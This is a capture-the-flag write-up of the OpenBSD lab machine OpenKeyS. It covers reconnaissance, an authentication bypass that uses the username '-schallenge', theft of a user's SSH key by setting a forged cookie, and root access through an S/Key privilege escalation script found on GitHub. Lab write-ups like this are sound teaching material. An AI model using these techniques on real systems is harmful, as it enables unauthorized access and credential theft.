Summary
OpenKeyS is a medium-rated OpenBSD machine created by polarbearer & GibParadox. Initial foothold can be obtained by discovering a authentication bypass on the HTTP service. User access is gained by adding a username cookie for a discovered user, ‘jennifer’ along with the exploitation of the authentication bypass to snatch an SSH private key. Root privilege is obtained by exploiting a local privilege escalation via S/Key auth with a user belonging to ‘auth’ group.
Reconnaissance
Nmap scan shows only port 22(SSH) and port 80(HTTP) open.
Visiting the HTTP service displays a login page. Trying common credentials failed to authenticate and robots.txt does not exist.
I did a directory brute force and managed to find a few directories to look at.
The includes directory shows a couple of files.
Checking auth.php.swp gives me some information such as a possible user ‘jennifer’ and another possible path to access a file ‘check_auth’.
I went and checked the ‘/auth_helpers/check_auth’ which prompts me to download a file.
The file is a binary executable but I didn’t bother looking into it yet and saved it for later if I was not able to find anything else.
Authentication Bypass
After doing some research on openbsd authentication, I found a few articles that explains an authentication bypass and a local privilege escalation.
By supplying -schallenge as the username and passwd as the password, I was able to login. The only problem is after loging in, I don’t find anything useful. All I know at this point is that the service running seems to store OpenSSH keys for users.
Since I have a possible user, I tried adding a cookie for user ‘jennifer’ and after performing the authentication bypass again, I was able to find jennifer’s SSH private key.
I downloaded the key, used it to login to SSH and grabbed the user flag.
Privilege Escalation
Since the article that I previously found already showcases a local privilege escalation exploit, I looked for publicly posted exploits and managed to find this bash script on github to escalate privileges. The script will check if the openbsd system supports Yubikey or S/Key authentication and will exploit accordingly as long as the current user belongs to the ‘auth’ group.
The exploit will delete the current /etc/skey/root file and replace it with a new one for me to be able to obtain root. After executing it, an S/Key password prompt will appear and after putting the provided password, I was able to get a root shell and finish it off by grabbing the root flag.
That is it for OpenKeyS, thanks for reading and stay safe all!
